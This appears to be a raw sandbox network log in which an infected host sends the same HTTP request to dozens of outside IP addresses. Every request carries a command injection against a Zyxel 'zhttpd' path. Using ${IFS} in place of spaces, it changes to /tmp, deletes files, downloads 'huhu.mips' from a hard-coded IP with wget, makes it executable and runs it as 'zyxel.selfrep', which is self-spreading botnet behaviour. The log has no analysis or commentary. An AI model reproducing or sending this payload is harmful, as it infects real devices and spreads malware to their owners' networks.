                                            Feb 2, 2024 06:21:06.504302979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2797192.168.2.1537498156.191.188.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504328012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2798192.168.2.1536998183.28.194.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504354000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2799192.168.2.1539612160.136.159.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504383087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2800192.168.2.1557066222.42.58.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504430056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2801192.168.2.155437637.215.189.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504467010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2802192.168.2.153583882.241.220.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504492044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2803192.168.2.15415448.198.129.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504528999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2804192.168.2.154837089.109.48.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504565954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2805192.168.2.154176817.73.31.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504631996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2806192.168.2.1549606111.161.241.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504672050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2807192.168.2.153359467.153.144.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504713058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2808192.168.2.1552116222.229.100.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504745960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2809192.168.2.1547144140.178.19.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504781961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2810192.168.2.154128661.218.2.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504844904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2811192.168.2.155029297.121.8.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504868031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2812192.168.2.1535230135.127.131.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504933119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2813192.168.2.1540780181.106.49.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504973888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2814192.168.2.155592682.181.213.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.504985094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2815192.168.2.1548254223.157.138.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505031109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2816192.168.2.153708464.209.216.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505070925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2817192.168.2.1545798198.89.236.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505121946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2818192.168.2.153999025.77.239.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505166054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2819192.168.2.1552586158.135.160.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505208015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2820192.168.2.1560184177.176.203.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505244017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2821192.168.2.153281875.60.162.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505291939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2822192.168.2.1554016122.205.197.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505321980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2823192.168.2.1551186111.197.215.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505378962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2824192.168.2.1555310200.219.223.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505419016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2825192.168.2.155558843.192.206.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505486965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2826192.168.2.1560726154.147.170.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505496979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2827192.168.2.1536580220.143.79.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505574942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2828192.168.2.15422528.185.108.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505600929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2829192.168.2.155614099.210.166.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505629063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2830192.168.2.155940814.151.18.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505657911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2831192.168.2.1544580221.218.169.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505701065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2832192.168.2.1549430169.140.12.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505736113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2833192.168.2.1559084220.199.103.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505780935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2834192.168.2.1538962152.247.18.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505812883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2835192.168.2.155560048.169.64.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505840063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2836192.168.2.1542130194.7.229.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505871058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2837192.168.2.153732261.18.68.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505920887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2838192.168.2.1558566177.124.157.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505949974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2839192.168.2.155216654.47.201.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.505980968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2840192.168.2.1543194150.236.76.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506026030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2841192.168.2.1555402119.94.202.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506067038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2842192.168.2.155548894.80.176.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506114006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2843192.168.2.1548888132.110.10.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506158113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2844192.168.2.1557896144.218.108.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506195068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2845192.168.2.1559176197.127.123.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506225109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2846192.168.2.153746089.134.122.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506280899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2847192.168.2.155634444.238.248.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506304026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2848192.168.2.1539312133.77.190.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506344080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2849192.168.2.155485858.150.39.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506391048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2850192.168.2.153946286.176.38.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506431103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2851192.168.2.154950494.123.102.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506445885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2852192.168.2.15331045.28.84.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506483078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2853192.168.2.153578432.189.207.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506511927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2854192.168.2.155835866.184.117.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506561995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2855192.168.2.1535890151.121.116.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506611109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2856192.168.2.154443069.75.236.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506633043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2857192.168.2.1535294131.35.179.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506678104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2858192.168.2.1540608123.67.14.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506720066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2859192.168.2.1545792114.243.19.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:06.506773949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2860192.168.2.1543344135.92.249.4443
                                            TimestampBytes transferredDirectionData
